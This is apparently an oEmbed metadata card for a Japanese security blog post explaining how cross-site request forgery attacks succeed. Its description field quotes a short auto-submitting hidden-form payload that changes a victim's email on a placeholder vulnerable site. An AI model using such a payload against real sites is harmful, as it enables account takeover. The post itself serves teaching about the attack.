{"height":"190","title":"CSRF\u306e\u4ed5\u7d44\u307f\uff08\u6700\u7d42\u7ae0\uff09\uff1a\u88ab\u5bb3\u304c\u6210\u7acb\u3059\u308b\u30d7\u30ed\u30bb\u30b9\u3068Cookie\u4ee5\u5916\u306e\u5fdc\u7528\u30b1\u30fc\u30b9","provider_url":"https://hatena.blog","version":"1.0","url":"https://cysec148.hatenablog.com/entry/2025/05/19/161713","categories":["Web Security Academy","CSRF"],"author_name":"ThisIsOne","provider_name":"Hatena Blog","published":"2025-05-19 16:17:13","type":"rich","width":"100%","blog_url":"https://cysec148.hatenablog.com/","author_url":"https://blog.hatena.ne.jp/ThisIsOne/","image_url":null,"blog_title":"Shikata Ga Nai","description":"Hello there, ('\u03c9')\u30ce \u2705 \u88ab\u5bb3\u8005\u304c\u653b\u6483\u8005\u306e\u30da\u30fc\u30b8\u3092\u8a2a\u308c\u308b\u3068\u3069\u3046\u306a\u308b\u304b\uff1f \u653b\u6483\u8005\u304c\u4f5c\u6210\u3057\u305fHTML\u3092\u4ed5\u8fbc\u3093\u3060\u30da\u30fc\u30b8\u306b\u3001\u88ab\u5bb3\u8005\u304c\u30a2\u30af\u30bb\u30b9\u3059\u308b\u3068\uff1a 1\ufe0f\u20e3 \u653b\u6483\u30da\u30fc\u30b8\u304cHTTP\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u767a\u52d5 <form action=\"https://vulnerable-website.com/email/change\" method=\"POST\"> <input type=\"hidden\" name=\"email\" value=\"pwned@evil-user.net\" /> </form> <script> document.forms[0].submit(); </script> \u2192 J\u2026","html":"<iframe src=\"https://hatenablog-parts.com/embed?url=https%3A%2F%2Fcysec148.hatenablog.com%2Fentry%2F2025%2F05%2F19%2F161713\" title=\"CSRF\u306e\u4ed5\u7d44\u307f\uff08\u6700\u7d42\u7ae0\uff09\uff1a\u88ab\u5bb3\u304c\u6210\u7acb\u3059\u308b\u30d7\u30ed\u30bb\u30b9\u3068Cookie\u4ee5\u5916\u306e\u5fdc\u7528\u30b1\u30fc\u30b9 - Shikata Ga Nai\" class=\"embed-card embed-blogcard\" scrolling=\"no\" frameborder=\"0\" style=\"display: block; width: 100%; height: 190px; max-width: 500px; margin: 10px 0px;\"></iframe>"}